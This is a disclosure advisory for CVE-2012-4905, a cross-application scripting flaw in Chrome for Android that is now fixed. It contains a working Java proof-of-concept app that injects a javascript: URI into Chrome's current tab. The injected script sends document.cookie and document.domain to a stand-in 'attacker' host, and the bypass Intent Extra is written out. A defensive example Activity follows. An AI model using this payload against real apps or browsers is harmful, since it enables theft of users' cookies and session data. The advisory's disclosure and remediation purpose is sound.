
Chrome for Android - UXSS via com.android.browser.application_id Intent extra

CVE Number:         CVE-2012-4905
Title:              Chrome for Android - UXSS via com.android.browser.application_id Intent extra
Affected Software:  Confirmed on Chrome for Android v18.0.1025123
Credit:             Takeshi Terada
Issue Status:       v18.0.1025308 was released which fixes this vulnerability

  By sending a crafted Intent to Chrome for Android, a malicious Android app can
  inject JavaScript into arbitrary web pages rendered in Chrome. This kind of
  UXSS-like vulnerability is often called Cross-Application Scripting.

  When another Android app sends an Intent carrying a javascript: URI to Chrome for
  Android (v18.0.1025123), Chrome opens a new tab and executes the JavaScript code
  in the context of that blank tab, where there is no page content or cookies for
  the script to reach. This is probably a deliberate countermeasure against UXSS
  attacks.

  However, the countermeasure can be bypassed by attaching the following Extra to
  the Intent:

  intent.putExtra("com.android.browser.application_id", "com.android.chrome");

  This Extra is the one the stock Android Browser uses to tie incoming URLs to
  the app that opened a tab, and Chrome trusts it even though any caller can set
  it. With the Extra present, Chrome loads the javascript: URI from the Intent in
  the current foreground tab instead of in a blank tab.

  A malicious app can therefore execute arbitrary JavaScript in whatever origin is
  currently displayed in Chrome. As a result, other apps can steal that origin's
  cookies (those readable from document.cookie) and other page data.

Proof of Concept:
  package jp.mbsd.terada.attackchrome1;

  import android.app.Activity;
  import android.content.Intent;
  import android.net.Uri;
  import android.os.Bundle;

  public class Main extends Activity {
      @Override
      public void onCreate(Bundle savedInstanceState) {
          super.onCreate(savedInstanceState);
          // Run the attack off the UI thread so the sleep below does not block it
          new Thread(new Runnable() {
              public void run() { doit(); }
          }).start();
      }

      // get intent to invoke the chrome app: an explicit VIEW Intent addressed
      // to Chrome's main Activity, carrying the URL to open
      public Intent getIntentForChrome(String url) {
          Intent intent = new Intent("android.intent.action.VIEW");
          intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
          intent.setData(Uri.parse(url));
          return intent;
      }

      public void doit() {
          try {
              // At first, force the chrome app to open a target Web page
              Intent intent1 = getIntentForChrome("http://www.google.com/1");
              startActivity(intent1);

              // wait a few seconds for the target page to load in the foreground tab
              Thread.sleep(3000);

              // JS code to inject into the target (www.google.com): leak
              // document.cookie and document.domain via an image request
              String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
                  + "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
                  + "document.body.appendChild(img);";
              Intent intent2 = getIntentForChrome(jsURL);

              // Trick to prevent Chrome from opening the JS URL in a different tab
              intent2.putExtra("com.android.browser.application_id", "com.android.chrome");

              // Inject JS into the target Web page
              startActivity(intent2);
          } catch (Exception e) {
          }
      }
  }

Timeline:
  2012/07/07  Reported to Google security team.
  2012/09/12  Vendor announced v18.0.1025308.
  2013/01/07  Disclosure of this advisory.

Solution:
  Upgrade to the latest version.
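  For browser developers, the lesson of this advisory is that an Intent Extra is
  caller-controlled data and cannot by itself decide where an incoming URL is
  loaded. The Activity below is an added example written for this advisory; it is
  not Chrome's code and not the patch Google shipped. It assumes a hypothetical
  browser with helper methods loadInCurrentTab() and openInNewTab(), a
  hypothetical Extra name example.browser.self_token, and uses a PendingIntent as
  a self-origin token (PendingIntent.getCreatorPackage(), API level 17 and later),
  because the system records the package that created a PendingIntent and another
  app cannot forge one.

```java
// Added example, not Chrome's code: a browser Activity that refuses to run
// javascript: URIs arriving from other apps, and honours the application_id
// Extra only when the Intent carries an unforgeable token proving that this
// app built the Intent itself.
import android.app.Activity;
import android.app.PendingIntent;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class BrowserActivity extends Activity {
    static final String EXTRA_APPLICATION_ID = "com.android.browser.application_id";
    // Hypothetical Extra name for the self-origin token (assumption for this example)
    static final String EXTRA_SELF_TOKEN = "example.browser.self_token";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        handleViewIntent(getIntent());
    }

    @Override
    protected void onNewIntent(Intent intent) {
        super.onNewIntent(intent);
        handleViewIntent(intent);
    }

    void handleViewIntent(Intent intent) {
        if (intent == null || !Intent.ACTION_VIEW.equals(intent.getAction())) return;
        Uri uri = intent.getData();
        if (uri == null) return;

        // Rule 1: Intents from outside may only navigate to web origins. Anything
        // else (javascript:, file:, content:, ...) is dropped before any tab
        // decision is made, so no Extra can turn it into script execution.
        String scheme = uri.getScheme();
        if (!"http".equalsIgnoreCase(scheme) && !"https".equalsIgnoreCase(scheme)) {
            return;
        }

        // Rule 2: reusing the foreground tab (the behaviour the advisory abuses)
        // is allowed only when the Intent provably came from this app. The
        // string Extra alone proves nothing, since any caller can set it.
        boolean sameTab = isFromSelf(intent)
                && getPackageName().equals(intent.getStringExtra(EXTRA_APPLICATION_ID));
        if (sameTab) {
            loadInCurrentTab(uri);
        } else {
            openInNewTab(uri);
        }
    }

    // The system records the creator of a PendingIntent when it is made, so
    // another app cannot claim to be us by attaching one it created itself.
    boolean isFromSelf(Intent intent) {
        PendingIntent token = intent.getParcelableExtra(EXTRA_SELF_TOKEN);
        return token != null && getPackageName().equals(token.getCreatorPackage());
    }

    // How this app would build its own Intents: attach a PendingIntent that
    // only it could have created (FLAG_IMMUTABLE is required on Android 12+).
    Intent buildSelfIntent(Uri uri) {
        Intent intent = new Intent(Intent.ACTION_VIEW, uri);
        intent.setClass(this, BrowserActivity.class);
        intent.putExtra(EXTRA_APPLICATION_ID, getPackageName());
        intent.putExtra(EXTRA_SELF_TOKEN,
                PendingIntent.getActivity(this, 0, new Intent(), PendingIntent.FLAG_IMMUTABLE));
        return intent;
    }

    // Hypothetical tab-management hooks; a real browser supplies these.
    void loadInCurrentTab(Uri uri) { /* navigate the foreground tab to uri */ }
    void openInNewTab(Uri uri) { /* create a fresh tab and navigate it to uri */ }
}
```

  The scheme check alone closes the hole described in this advisory, because a
  javascript: URI never reaches the tab-selection logic at all. The token is what
  makes it safe to keep tab reuse for the browser's own Intents without trusting
  a string that any installed app can copy.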